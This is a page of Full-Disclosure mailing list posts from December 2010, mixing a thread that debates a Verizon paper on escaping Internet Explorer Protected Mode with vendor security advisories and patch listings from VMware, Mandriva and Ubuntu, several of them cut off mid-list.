Re: [Full-disclosure] verizon vs m$
do i get it right?: 1. the verizon paper is entirely correct 2. some interpret it as a feature and some as a bug? On Sun, Dec 05, 2010 at 11:25:36PM +0200, Georgi Guninski wrote: > in a world like this, verizon kills exploder bugs: > > http://www.theregister.co.uk/2010/12/03/protected_mode_bypass/ > http://www.verizonbusiness.com/resources/whitepapers/wp_escapingmicrosoftprotectedmodeinternetexplorer_en_xg.pdf > > the language doesn't seem passionate: > - > Finally, Microsoft and other software vendors should clearly document which > features do and do not > have associated security claims. Clearly stating which features make security > claims, and which do not, > will allow informed decisions to be made on IT security issues. > - > > lol > > -- > joro > > ___ > Full-Disclosure - We believe in it. > Charter: http://lists.grok.org.uk/full-disclosure-charter.html > Hosted and sponsored by Secunia - http://secunia.com/ ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] verizon vs m$
On Tue, Dec 7, 2010 at 6:02 PM, Georgi Guninski wrote: > do i get it right?: > > 1. the verizon paper is entirely correct Well, sure. > 2. some interpret it as a feature and some as a bug? Does it have to be either? > > On Sun, Dec 05, 2010 at 11:25:36PM +0200, Georgi Guninski wrote: >> in a world like this, verizon kills exploder bugs: >> >> http://www.theregister.co.uk/2010/12/03/protected_mode_bypass/ >> http://www.verizonbusiness.com/resources/whitepapers/wp_escapingmicrosoftprotectedmodeinternetexplorer_en_xg.pdf >> >> the language doesn't seem passionate: >> - >> Finally, Microsoft and other software vendors should clearly document which >> features do and do not >> have associated security claims. Clearly stating which features make >> security claims, and which do not, >> will allow informed decisions to be made on IT security issues. >> - >> >> lol >> >> -- >> joro >> >> ___ >> Full-Disclosure - We believe in it. >> Charter: http://lists.grok.org.uk/full-disclosure-charter.html >> Hosted and sponsored by Secunia - http://secunia.com/ > > ___ > Full-Disclosure - We believe in it. > Charter: http://lists.grok.org.uk/full-disclosure-charter.html > Hosted and sponsored by Secunia - http://secunia.com/ > ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
[Full-disclosure] VMSA-2010-0019 VMware ESX third party updates for Service Console
-BEGIN PGP SIGNED MESSAGE- Hash: SHA1 - VMware Security Advisory Advisory ID: VMSA-2010-0019 Synopsis: VMware ESX third party updates for Service Console Issue date:2010-12-07 Updated on:2010-12-07 CVE numbers: CVE-2010-3069 CVE-2010-0405 CVE-2009-0590 CVE-2009-2409 CVE-2009-3555 - 1. Summary ESX 3.x Console OS (COS) updates for samba, bzip2, and openssl packages. 2. Relevant releases VMware ESX 3.5 without patches ESX350-201012408-SG, ESX350-201012409-SG, ESX350-201012401-SG Notes: Effective May 2010, VMware's patch and update release program during Extended Support will be continued with the condition that all subsequent patch and update releases will be based on the latest baseline release version as of May 2010 (i.e. ESX 3.0.3 Update 1, ESX 3.5 Update 5, and VirtualCenter 2.5 Update 6). Refer to section "End of Product Availability FAQs" at http://www.vmware.com/support/policies/lifecycle/vi/faq.html for details. Extended support for ESX 3.0.3 ends on 2011-12-10. Users should plan to upgrade to at least ESX 3.5 and preferably to the newest release available. 3. Problem Description a. Service Console update for samba The service console package samba is updated to version 3.0.9-1.3E.18. The Common Vulnerabilities and Exposures project (cve.mitre.org) has assigned the name CVE-2010-3069 to this issue. Column 4 of the following table lists the action required to remediate the vulnerability in each release, if a solution is available. VMware Product Running Replace with/ ProductVersion on Apply Patch = === = VirtualCenter any Windows not affected hosted * any any not affected ESXi any ESXi not affected ESX4.1 ESX not applicable ESX4.0 ESX not applicable ESX3.5 ESX ESX350-201012408-SG ESX3.0.3 ESX affected, patch pending * hosted products are VMware Workstation, Player, ACE, Server, Fusion. b. Service Console update for bzip2 The service console package bzip2 updated to version 1.0.2-14.EL3. The Common Vulnerabilities and Exposures project (cve.mitre.org) has assigned the name CVE-2010-0405 to this issue. Column 4 of the following table lists the action required to remediate the vulnerability in each release, if a solution is available. VMware Product Running Replace with/ ProductVersion on Apply Patch = === = VirtualCenter any Windows not affected hosted * any any not affected ESXi any ESXi not affected ESX4.1 ESX affected, patch pending ESX4.0 ESX affected, patch pending ESX3.5 ESX ESX350-201012409-SG ESX3.0.3 ESX affected, patch pending * hosted products are VMware Workstation, Player, ACE, Server, Fusion. c. Service Console update for OpenSSL The service console package openssl updated to version 0.9.7a-33.26. The Common Vulnerabilities and Exposures project (cve.mitre.org) has assigned the names CVE-2009-0590, CVE-2009-2409 and CVE-2009-3555 to the issues addressed in this update. Column 4 of the following table lists the action required to remediate the vulnerability in each release, if a solution is available. VMware Product Running Replace with/ ProductVersion on Apply Patch = === = VirtualCenter any Windows not affected hosted * any any not affected ESXi any ESXi not affected ESX4.1 ESX not applicable ESX4.0 ESX not applicable ESX3.5 ESX ESX350-201012401-SG ESX3.0.3 ESX affected, no patch planned * hosted products are VMware Workstation, Player, ACE, Server, Fusion. 4. Solution Please review the patch/release notes for your product and version and verify the md5sum of your downloaded file. ESX 3.5 --- Samba http://download3.vmware.com/software/vi/ESX350-201012408-SG.zip md5sum: 53a427d5d2213c51d57e8e8f7e3d544c http://kb.vmware.com/kb/102 bzip http://download3.vmware.com/software/vi/ESX350-201012409-SG.zip md5sum: 0a688d7153380fcb5d7ca0ac098e2d03 http://kb.vmware.com/kb/103 openssl http://download3.vm
Re: [Full-disclosure] verizon vs m$
>>> 2. some interpret it as a feature and some as a bug? > Does it have to be either? It sounds to me as if this is a deliberate design decision, and people are disagreeing over the severity of its implications. LJS ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] verizon vs m$
On Tue, Dec 7, 2010 at 10:12 PM, wrote: > On Tue, 07 Dec 2010 07:16:34 EST, Larry Seltzer said: >> >>> 2. some interpret it as a feature and some as a bug? >> >> > Does it have to be either? >> >> It sounds to me as if this is a deliberate design decision, and people are >> disagreeing over the severity of its implications. > > Some people refer to that as a "feee-tchure" or "Broken As Designed". It's > technically not a bug, but it does violate the Principle of Least Surprise. > > To be fair, "Surprise! Nothing works" would be a little more surprising. ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] verizon vs m$
On Tue, 07 Dec 2010 07:16:34 EST, Larry Seltzer said: > >>> 2. some interpret it as a feature and some as a bug? > > > Does it have to be either? > > It sounds to me as if this is a deliberate design decision, and people are > disagreeing over the severity of its implications. Some people refer to that as a "feee-tchure" or "Broken As Designed". It's technically not a bug, but it does violate the Principle of Least Surprise. pgpTl208JmVGo.pgp Description: PGP signature ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
[Full-disclosure] [ MDVSA-2010:248 ] openssl
-BEGIN PGP SIGNED MESSAGE- Hash: SHA1 ___ Mandriva Linux Security Advisory MDVSA-2010:248 http://www.mandriva.com/security/ ___ Package : openssl Date: December 7, 2010 Affected: 2009.0, 2010.0, 2010.1, Corporate 4.0, Enterprise Server 5.0 ___ Problem Description: A vulnerability was discovered and corrected in openssl: OpenSSL before 0.9.8q, and 1.0.x before 1.0.0c, when SSL_OP_NETSCAPE_REUSE_CIPHER_CHANGE_BUG is enabled, does not properly prevent modification of the ciphersuite in the session cache, which allows remote attackers to force the use of an unintended cipher via vectors involving sniffing network traffic to discover a session identifier (CVE-2010-4180). Packages for 2009.0 are provided as of the Extended Maintenance Program. Please visit this link to learn more: http://store.mandriva.com/product_info.php?cPath=149&products_id=490 The updated packages have been patched to correct this issue. ___ References: http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-4180 ___ Updated Packages: Mandriva Linux 2009.0: a4b19ac2810b464392bb2f3b5292fe67 2009.0/i586/libopenssl0.9.8-0.9.8h-3.9mdv2009.0.i586.rpm 6169959e4a5f0acbdab7269ac99baa8d 2009.0/i586/libopenssl0.9.8-devel-0.9.8h-3.9mdv2009.0.i586.rpm 64195ec5f2e7868a49c280d3a32168cd 2009.0/i586/libopenssl0.9.8-static-devel-0.9.8h-3.9mdv2009.0.i586.rpm 7a1c151567d7f9d364a79ecd63322d47 2009.0/i586/openssl-0.9.8h-3.9mdv2009.0.i586.rpm 6e96fc588f1921571046fbc14928e5a1 2009.0/SRPMS/openssl-0.9.8h-3.9mdv2009.0.src.rpm Mandriva Linux 2009.0/X86_64: a77409f3bedc0446f8eda39281dbf7a4 2009.0/x86_64/lib64openssl0.9.8-0.9.8h-3.9mdv2009.0.x86_64.rpm feffaacd70224326c3582eb93156864b 2009.0/x86_64/lib64openssl0.9.8-devel-0.9.8h-3.9mdv2009.0.x86_64.rpm e2cb3f77f36b8b0a6ca214861bf79be3 2009.0/x86_64/lib64openssl0.9.8-static-devel-0.9.8h-3.9mdv2009.0.x86_64.rpm d6e667e012727d34442e23f91b005b40 2009.0/x86_64/openssl-0.9.8h-3.9mdv2009.0.x86_64.rpm 6e96fc588f1921571046fbc14928e5a1 2009.0/SRPMS/openssl-0.9.8h-3.9mdv2009.0.src.rpm Mandriva Linux 2010.0: 86223cb60de3ea76f185425da6b299f2 2010.0/i586/libopenssl0.9.8-0.9.8k-5.4mdv2010.0.i586.rpm 7624aa325a944ee5f4898dfd3a1c4340 2010.0/i586/libopenssl0.9.8-devel-0.9.8k-5.4mdv2010.0.i586.rpm 95ac866a31973ccf4c2e6d04012e7e67 2010.0/i586/libopenssl0.9.8-static-devel-0.9.8k-5.4mdv2010.0.i586.rpm 445c417e7de8145daefedf113b343ff5 2010.0/i586/openssl-0.9.8k-5.4mdv2010.0.i586.rpm 27fc76be287e1cd06adb2725df0c4167 2010.0/SRPMS/openssl-0.9.8k-5.4mdv2010.0.src.rpm Mandriva Linux 2010.0/X86_64: 391cb84677230e2c39708db0797b2e87 2010.0/x86_64/lib64openssl0.9.8-0.9.8k-5.4mdv2010.0.x86_64.rpm 7f251668cfd04bd1e2a634030c28929f 2010.0/x86_64/lib64openssl0.9.8-devel-0.9.8k-5.4mdv2010.0.x86_64.rpm 9110c45d54ce48c4ad0c8fe231f7f027 2010.0/x86_64/lib64openssl0.9.8-static-devel-0.9.8k-5.4mdv2010.0.x86_64.rpm 43e7eae967aad5b140eed29dab277aa2 2010.0/x86_64/openssl-0.9.8k-5.4mdv2010.0.x86_64.rpm 27fc76be287e1cd06adb2725df0c4167 2010.0/SRPMS/openssl-0.9.8k-5.4mdv2010.0.src.rpm Mandriva Linux 2010.1: 9cf211d5095ca7a5a82aa980d4eebd5d 2010.1/i586/libopenssl1.0.0-1.0.0a-1.6mdv2010.1.i586.rpm 788019361b199d0b6a0f3331294ac154 2010.1/i586/libopenssl1.0.0-devel-1.0.0a-1.6mdv2010.1.i586.rpm b2372b8919a8ab458ade4ce47080f7ff 2010.1/i586/libopenssl1.0.0-static-devel-1.0.0a-1.6mdv2010.1.i586.rpm cd5929de815b6eec25d1d683f4363db0 2010.1/i586/libopenssl-engines1.0.0-1.0.0a-1.6mdv2010.1.i586.rpm 60fee57d944361e4fa369412c71a59a9 2010.1/i586/openssl-1.0.0a-1.6mdv2010.1.i586.rpm 2f28a567af2f44df1fbac7006d27db5d 2010.1/SRPMS/openssl-1.0.0a-1.6mdv2010.1.src.rpm Mandriva Linux 2010.1/X86_64: ab021cadcaa131053ba5ac3940298f86 2010.1/x86_64/lib64openssl1.0.0-1.0.0a-1.6mdv2010.1.x86_64.rpm a2119fefbe8cfb649e88b3faf85ffba1 2010.1/x86_64/lib64openssl1.0.0-devel-1.0.0a-1.6mdv2010.1.x86_64.rpm 067878d8ff9ec0002c0a7653a1b87b05 2010.1/x86_64/lib64openssl1.0.0-static-devel-1.0.0a-1.6mdv2010.1.x86_64.rpm 60a8142259ee202b6327e8a2c0f86755 2010.1/x86_64/lib64openssl-engines1.0.0-1.0.0a-1.6mdv2010.1.x86_64.rpm a4c77c129fd43f7918075fadf461fe8b 2010.1/x86_64/openssl-1.0.0a-1.6mdv2010.1.x86_64.rpm 2f28a567af2f44df1fbac7006d27db5d 2010.1/SRPMS/openssl-1.0.0a-1.6mdv2010.1.src.rpm Corporate 4.0: 3f7610ee9ee7aa4b8d1ed3997e28d09b corporate/4.0/i586/libopenssl0.9.7-0.9.7g-2.13.20060mlcs4.i586.rpm 25a4686ef5ca8302eebf2f1b4fe67e35 corporate/4.0/i586/libopenssl0.9.7-devel-0.9.7g-2.13.20060mlcs4.i586.rpm c5f5a562293eae123b05a96d3ba663d7 corporate/4.0/i586/libopenssl0.9.7-static-dev
[Full-disclosure] [ MDVSA-2010:249 ] clamav
-BEGIN PGP SIGNED MESSAGE- Hash: SHA1 ___ Mandriva Linux Security Advisory MDVSA-2010:249 http://www.mandriva.com/security/ ___ Package : clamav Date: December 7, 2010 Affected: 2009.0, Corporate 4.0, Enterprise Server 5.0 ___ Problem Description: Multiple vulnerabilities were discovered and corrected in clamav: Multiple unspecified vulnerabilities in pdf.c in libclamav in ClamAV before 0.96.5 allow remote attackers to cause a denial of service (application crash) or possibly execute arbitrary code via a crafted PDF document (CVE-2010-4260, (CVE-2010-4479). Off-by-one error in the icon_cb function in pe_icons.c in libclamav in ClamAV before 0.96.5 allows remote attackers to cause a denial of service (memory corruption and application crash) or possibly execute arbitrary code via unspecified vectors. NOTE: some of these details are obtained from third party information (CVE-2010-4261). Packages for 2009.0 are provided as of the Extended Maintenance Program. Please visit this link to learn more: http://store.mandriva.com/product_info.php?cPath=149&products_id=490 The updated clamav packages have been upgraded to the 0.96.5 version that is not vulnerable to these issues. ___ References: http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-4260 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-4261 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-4479 ___ Updated Packages: Mandriva Linux 2009.0: 9ead4a15ce0b94209cd072fdc0210d7c 2009.0/i586/clamav-0.96.5-0.1mdv2009.0.i586.rpm f07c8219761b696e26282fa852fbe4ad 2009.0/i586/clamav-db-0.96.5-0.1mdv2009.0.i586.rpm 5f3592e1ef8bc479e8791fbf6ed1c5b1 2009.0/i586/clamav-milter-0.96.5-0.1mdv2009.0.i586.rpm f94e7fff4f175c49da1d74a09074cc05 2009.0/i586/clamd-0.96.5-0.1mdv2009.0.i586.rpm 954bc02f355d263f29a12c450d4b057b 2009.0/i586/libclamav6-0.96.5-0.1mdv2009.0.i586.rpm 82e3c8b870a847b62a889effcf0df5ee 2009.0/i586/libclamav-devel-0.96.5-0.1mdv2009.0.i586.rpm ecd257622ed55d4990e042c6dd381c42 2009.0/SRPMS/clamav-0.96.5-0.1mdv2009.0.src.rpm Mandriva Linux 2009.0/X86_64: 2b84bb3db11ae2b7bfc6fe48a2e07ef7 2009.0/x86_64/clamav-0.96.5-0.1mdv2009.0.x86_64.rpm 8cdd574ed24d552aef5e4d3772963fab 2009.0/x86_64/clamav-db-0.96.5-0.1mdv2009.0.x86_64.rpm 802114d391b05e7c87ab19e2178ca324 2009.0/x86_64/clamav-milter-0.96.5-0.1mdv2009.0.x86_64.rpm 04d1665b37a93391ca619930440065b7 2009.0/x86_64/clamd-0.96.5-0.1mdv2009.0.x86_64.rpm 318b41bcab46e00e28bb627090a1ba0f 2009.0/x86_64/lib64clamav6-0.96.5-0.1mdv2009.0.x86_64.rpm 7e768e6a84594437e2aa901e1e032c89 2009.0/x86_64/lib64clamav-devel-0.96.5-0.1mdv2009.0.x86_64.rpm ecd257622ed55d4990e042c6dd381c42 2009.0/SRPMS/clamav-0.96.5-0.1mdv2009.0.src.rpm Corporate 4.0: f5a8398d84556589b37c7d4b83719526 corporate/4.0/i586/clamav-0.96.5-0.1.20060mlcs4.i586.rpm 2dff852878c15339603b8d90c90d02c9 corporate/4.0/i586/clamav-db-0.96.5-0.1.20060mlcs4.i586.rpm 5223406ce119a25634e7a8b9883f5c1d corporate/4.0/i586/clamav-milter-0.96.5-0.1.20060mlcs4.i586.rpm 9a05c1072414eaa6be27d4cb49c67c38 corporate/4.0/i586/clamd-0.96.5-0.1.20060mlcs4.i586.rpm 2b7b4887e66b5228d70174c7871e0557 corporate/4.0/i586/libclamav6-0.96.5-0.1.20060mlcs4.i586.rpm fe0f1b51afd4950f5ecd118f8d780990 corporate/4.0/i586/libclamav-devel-0.96.5-0.1.20060mlcs4.i586.rpm ee9b7ce35ad83dfec3b7ee4b68b1bafc corporate/4.0/SRPMS/clamav-0.96.5-0.1.20060mlcs4.src.rpm Corporate 4.0/X86_64: 00f581cf11a21be74865a9884a1f85e0 corporate/4.0/x86_64/clamav-0.96.5-0.1.20060mlcs4.x86_64.rpm 416f4b1f73a168aeac08ee2ec1b86ee2 corporate/4.0/x86_64/clamav-db-0.96.5-0.1.20060mlcs4.x86_64.rpm 6e1939794dbb2d24762323a524d8ef5a corporate/4.0/x86_64/clamav-milter-0.96.5-0.1.20060mlcs4.x86_64.rpm df4a0f11d30599bd76978650d31bd50c corporate/4.0/x86_64/clamd-0.96.5-0.1.20060mlcs4.x86_64.rpm e1f72491d2f168aec358f0c9779dded4 corporate/4.0/x86_64/lib64clamav6-0.96.5-0.1.20060mlcs4.x86_64.rpm db4feea7479714e0ed63df6ece12ffa2 corporate/4.0/x86_64/lib64clamav-devel-0.96.5-0.1.20060mlcs4.x86_64.rpm ee9b7ce35ad83dfec3b7ee4b68b1bafc corporate/4.0/SRPMS/clamav-0.96.5-0.1.20060mlcs4.src.rpm Mandriva Enterprise Server 5: 7dbe85e2b4070fa055a58165dd5e2da1 mes5/i586/clamav-0.96.5-0.1mdvmes5.1.i586.rpm 07c0b919ab8bb87e79d285f5afa7184a mes5/i586/clamav-db-0.96.5-0.1mdvmes5.1.i586.rpm adb539f66833633598f4d421c203d265 mes5/i586/clamav-milter-0.96.5-0.1mdvmes5.1.i586.rpm f2170ba7bb9d2c23521b4b30dca179d8 mes5/i586/clamd-0.96.5-0.1mdvmes5.1.i586.rpm 6f0bb2908d770bebe256c4f2a49c4ece mes5/i586/libclamav6-0.96.5-0.1mdvmes5.1.i5
Re: [Full-disclosure] verizon vs m$
>On Tue, 07 Dec 2010 07:16:34 EST, Larry Seltzer said: >> >>> 2. some interpret it as a feature and some as a bug? >> >> > Does it have to be either? >> >> It sounds to me as if this is a deliberate design decision, and people >> are disagreeing over the severity of its implications. > >Some people refer to that as a "feee-tchure" or "Broken As Designed". It's >technically not a bug, but it does violate the Principle of Least Surprise. Or, some people (like Larry) don't have a hyperbolic approach to exploit vector details. I like Larry's approach, and consider it the most accurate comment thus far (including my own). Rather than actual white papers and references to M$ and "Exploder," this entire "vector" can be summarized in one sentence: If you are running Vista+, and are on a domain, and have not altered the PM defaults, and if you have an unpatched vulnerability in IE that allows an attacker to remotely install a web service that runs on localhost and redirects your browser to that service, and the vulnerability is capable of being re-exploited, then the web service code could launch other code that runs in the Intranet zone with associated security settings that would run in the context of the local user. It could even be shorted to: The Intranet Zone has Protected Mode disabled, Internet zone does not. If you are worried about your domain users being exploited by unknown vulnerabilities that could be launched in the Intranet zone, then add localhost to your restricted zone. Since they are on a domain, this is a trivial task. Is this where the industry is now? If I wrote a similar white paper that applied to open source products and posted it here, I would be appropriately ridiculed off the list. I'll actually take this as a sign of progress - when the only way Guninski can get his "M$ Exploder" comments in is to reference other people's research-in-the-obvious and have something so trite be referred to as "Broken by Design" then it proves two things: Security is getting better, and people could not care less. t ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
[Full-disclosure] [USN-1026-1] Python Paste vulnerability
=== Ubuntu Security Notice USN-1026-1 December 07, 2010 paste vulnerability CVE-2010-2477 === A security issue affects the following Ubuntu releases: Ubuntu 10.04 LTS This advisory also applies to the corresponding versions of Kubuntu, Edubuntu, and Xubuntu. The problem can be corrected by upgrading your system to the following package versions: Ubuntu 10.04 LTS: python-paste1.7.2-4ubuntu1.2 In general, a standard system update will make all the necessary changes. Details follow: It was discovered that Python Paste did not properly sanitize certain strings, resulting in cross-site scripting (XSS) vulnerabilities. With cross-site scripting vulnerabilities, if a user were tricked into viewing server output during a crafted server request, a remote attacker could exploit this to modify the contents, or steal confidential data, within the same domain. Updated packages for Ubuntu 10.04 LTS: Source archives: http://security.ubuntu.com/ubuntu/pool/main/p/paste/paste_1.7.2-4ubuntu1.2.diff.gz Size/MD5: 8082 9e724e29311afd6ce7933ac42da6f11f http://security.ubuntu.com/ubuntu/pool/main/p/paste/paste_1.7.2-4ubuntu1.2.dsc Size/MD5: 2103 d4acd77a7f7d4461c11bc096b9434299 http://security.ubuntu.com/ubuntu/pool/main/p/paste/paste_1.7.2.orig.tar.gz Size/MD5: 373556 a6a58d08dc4bff91d5d1c519d2277f8a Architecture independent packages: http://security.ubuntu.com/ubuntu/pool/main/p/paste/python-paste_1.7.2-4ubuntu1.2_all.deb Size/MD5: 400764 73601619b0d8077ede5ae8d64c67f50c signature.asc Description: This is a digitally signed message part ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
[Full-disclosure] [USN-1027-1] Quagga vulnerabilities
=== Ubuntu Security Notice USN-1027-1 December 07, 2010 quagga vulnerabilities CVE-2010-2948, CVE-2010-2949 === A security issue affects the following Ubuntu releases: Ubuntu 6.06 LTS Ubuntu 8.04 LTS Ubuntu 9.10 Ubuntu 10.04 LTS This advisory also applies to the corresponding versions of Kubuntu, Edubuntu, and Xubuntu. The problem can be corrected by upgrading your system to the following package versions: Ubuntu 6.06 LTS: quagga 0.99.2-1ubuntu3.7 Ubuntu 8.04 LTS: quagga 0.99.9-2ubuntu1.4 Ubuntu 9.10: quagga 0.99.13-1ubuntu0.1 Ubuntu 10.04 LTS: quagga 0.99.15-1ubuntu0.1 In general, a standard system update will make all the necessary changes. Details follow: It was discovered that Quagga incorrectly handled certain Outbound Route Filtering (ORF) records. A remote authenticated attacker could use this flaw to cause a denial of service or potentially execute arbitrary code. The default compiler options for Ubuntu 8.04 LTS and later should reduce the vulnerability to a denial of service. (CVE-2010-2948) It was discovered that Quagga incorrectly parsed certain AS paths. A remote attacker could use this flaw to cause Quagga to crash, resulting in a denial of service. (CVE-2010-2949) Updated packages for Ubuntu 6.06 LTS: Source archives: http://security.ubuntu.com/ubuntu/pool/main/q/quagga/quagga_0.99.2-1ubuntu3.7.diff.gz Size/MD5:35595 33d87fda16424363b5ed66d76a0e84d0 http://security.ubuntu.com/ubuntu/pool/main/q/quagga/quagga_0.99.2-1ubuntu3.7.dsc Size/MD5: 1411 dfa7ab569c6be50f015f0261a767dd68 http://security.ubuntu.com/ubuntu/pool/main/q/quagga/quagga_0.99.2.orig.tar.gz Size/MD5: 2185137 88087d90697fcf5fe192352634f340b3 Architecture independent packages: http://security.ubuntu.com/ubuntu/pool/main/q/quagga/quagga-doc_0.99.2-1ubuntu3.7_all.deb Size/MD5: 664604 6ddb00d23f3d3fabbc1a35c9841a089a amd64 architecture (Athlon64, Opteron, EM64T Xeon): http://security.ubuntu.com/ubuntu/pool/main/q/quagga/quagga_0.99.2-1ubuntu3.7_amd64.deb Size/MD5: 1404736 31f4c356a361b0a1fe7c98e835f03d7e i386 architecture (x86 compatible Intel/AMD): http://security.ubuntu.com/ubuntu/pool/main/q/quagga/quagga_0.99.2-1ubuntu3.7_i386.deb Size/MD5: 1198278 3e99ddcc24b9bd6fb69f1c6dda66daf3 powerpc architecture (Apple Macintosh G3/G4/G5): http://security.ubuntu.com/ubuntu/pool/main/q/quagga/quagga_0.99.2-1ubuntu3.7_powerpc.deb Size/MD5: 1351762 67ae0179e652e156153f835db2ede8e9 sparc architecture (Sun SPARC/UltraSPARC): http://security.ubuntu.com/ubuntu/pool/main/q/quagga/quagga_0.99.2-1ubuntu3.7_sparc.deb Size/MD5: 1322666 6b282053912522c536a80263e3f713f9 Updated packages for Ubuntu 8.04 LTS: Source archives: http://security.ubuntu.com/ubuntu/pool/main/q/quagga/quagga_0.99.9-2ubuntu1.4.diff.gz Size/MD5:38201 c7162c4df4238379c40f153ab9bcfe86 http://security.ubuntu.com/ubuntu/pool/main/q/quagga/quagga_0.99.9-2ubuntu1.4.dsc Size/MD5: 1625 cb3558332bc96c2caa5b804fdc758759 http://security.ubuntu.com/ubuntu/pool/main/q/quagga/quagga_0.99.9.orig.tar.gz Size/MD5: 2341067 4dbdaf91bf6609803819d97d5fccc4c9 Architecture independent packages: http://security.ubuntu.com/ubuntu/pool/main/q/quagga/quagga-doc_0.99.9-2ubuntu1.4_all.deb Size/MD5: 661896 d8652bb4873a02f46d8d294683e84e38 amd64 architecture (Athlon64, Opteron, EM64T Xeon): http://security.ubuntu.com/ubuntu/pool/main/q/quagga/quagga_0.99.9-2ubuntu1.4_amd64.deb Size/MD5: 1622304 7288179aa5eb7c264135ab9980219d42 i386 architecture (x86 compatible Intel/AMD): http://security.ubuntu.com/ubuntu/pool/main/q/quagga/quagga_0.99.9-2ubuntu1.4_i386.deb Size/MD5: 1464836 36ddbb4a047833b00efd1d4387e6bec3 lpia architecture (Low Power Intel Architecture): http://ports.ubuntu.com/pool/main/q/quagga/quagga_0.99.9-2ubuntu1.4_lpia.deb Size/MD5: 1462038 5f4d47c79fe72cd2053d1c1b5f90799c powerpc architecture (Apple Macintosh G3/G4/G5): http://ports.ubuntu.com/pool/main/q/quagga/quagga_0.99.9-2ubuntu1.4_powerpc.deb Size/MD5: 1659270 40512b0af9e48b4f0a168056c9079f48 sparc architecture (Sun SPARC/UltraSPARC): http://ports.ubuntu.com/pool/main/q/quagga/quagga_0.99.9-2ubuntu1.4_sparc.deb Size/MD5: 1521808 bb4a215458bac828223fe5d2327a9242 Updated packages for Ubuntu 9.10: Source archives: http://security.ubuntu.com/ubuntu/pool/main/q/quagga/quagga_0.99.13-1ubuntu0.1.diff.gz Size/MD5:35758 bc638ecdc3c5ba6875a5fa0650e823f6 http://security.ubuntu.com/ubuntu/pool/main/q/quagga/quagga_0.99.13-1ubuntu0.1.dsc Size/MD5: 2067 915cb6412ba0b183d30ccecfddc6305d http://security.ubuntu.com/ubunt
[Full-disclosure] [USN-1028-1] ImageMagick vulnerability
=== Ubuntu Security Notice USN-1028-1 December 07, 2010 imagemagick vulnerability CVE-2010-4167 === A security issue affects the following Ubuntu releases: Ubuntu 8.04 LTS Ubuntu 9.10 Ubuntu 10.04 LTS Ubuntu 10.10 This advisory also applies to the corresponding versions of Kubuntu, Edubuntu, and Xubuntu. The problem can be corrected by upgrading your system to the following package versions: Ubuntu 8.04 LTS: imagemagick 7:6.3.7.9.dfsg1-2ubuntu1.2 Ubuntu 9.10: imagemagick 7:6.5.1.0-1.1ubuntu3.1 Ubuntu 10.04 LTS: imagemagick 7:6.5.7.8-1ubuntu1.1 Ubuntu 10.10: imagemagick 7:6.6.2.6-1ubuntu1.1 In general, a standard system update will make all the necessary changes. Details follow: It was discovered that ImageMagick would search for configuration files in the current directory. If a user were tricked into opening or processing an image in an arbitrary directory, a local attacker could execute arbitrary code with the user's privileges. Updated packages for Ubuntu 8.04 LTS: Source archives: http://security.ubuntu.com/ubuntu/pool/main/i/imagemagick/imagemagick_6.3.7.9.dfsg1-2ubuntu1.2.diff.gz Size/MD5: 148538 d0cce9adb56ecc3678a3f624ae4b61a8 http://security.ubuntu.com/ubuntu/pool/main/i/imagemagick/imagemagick_6.3.7.9.dfsg1-2ubuntu1.2.dsc Size/MD5: 2002 ce7176e40236686799c83220863be81b http://security.ubuntu.com/ubuntu/pool/main/i/imagemagick/imagemagick_6.3.7.9.dfsg1.orig.tar.gz Size/MD5: 8314133 6aedd4a612531ad35b38fb9386f17122 amd64 architecture (Athlon64, Opteron, EM64T Xeon): http://security.ubuntu.com/ubuntu/pool/main/i/imagemagick/imagemagick_6.3.7.9.dfsg1-2ubuntu1.2_amd64.deb Size/MD5: 1436188 ad5e6a839913506650ae9c7d3f9e24bd http://security.ubuntu.com/ubuntu/pool/main/i/imagemagick/libmagick++10_6.3.7.9.dfsg1-2ubuntu1.2_amd64.deb Size/MD5: 168876 99268ef73e6f25b3f687283d7ef92f27 http://security.ubuntu.com/ubuntu/pool/main/i/imagemagick/libmagick++9-dev_6.3.7.9.dfsg1-2ubuntu1.2_amd64.deb Size/MD5: 225966 97a0dd82dae7286cf412b1d750645d31 http://security.ubuntu.com/ubuntu/pool/main/i/imagemagick/libmagick10_6.3.7.9.dfsg1-2ubuntu1.2_amd64.deb Size/MD5: 4223226 8f95fa4cee6634672af6a1425593624f http://security.ubuntu.com/ubuntu/pool/main/i/imagemagick/libmagick9-dev_6.3.7.9.dfsg1-2ubuntu1.2_amd64.deb Size/MD5: 1298366 6fd8fa85987e15c5908f801fe20edaa9 http://security.ubuntu.com/ubuntu/pool/universe/i/imagemagick/perlmagick_6.3.7.9.dfsg1-2ubuntu1.2_amd64.deb Size/MD5: 176812 5c481bdd3bc77b3adf34a4c2ca0bb0c4 i386 architecture (x86 compatible Intel/AMD): http://security.ubuntu.com/ubuntu/pool/main/i/imagemagick/imagemagick_6.3.7.9.dfsg1-2ubuntu1.2_i386.deb Size/MD5: 1429790 627ff519d970da5963b736d4d7fbbbae http://security.ubuntu.com/ubuntu/pool/main/i/imagemagick/libmagick++10_6.3.7.9.dfsg1-2ubuntu1.2_i386.deb Size/MD5: 173816 70d728448f29e68a2340e6a9af7bbbea http://security.ubuntu.com/ubuntu/pool/main/i/imagemagick/libmagick++9-dev_6.3.7.9.dfsg1-2ubuntu1.2_i386.deb Size/MD5: 209622 24cab5c3f87dcafb4d249a2dacecc8b6 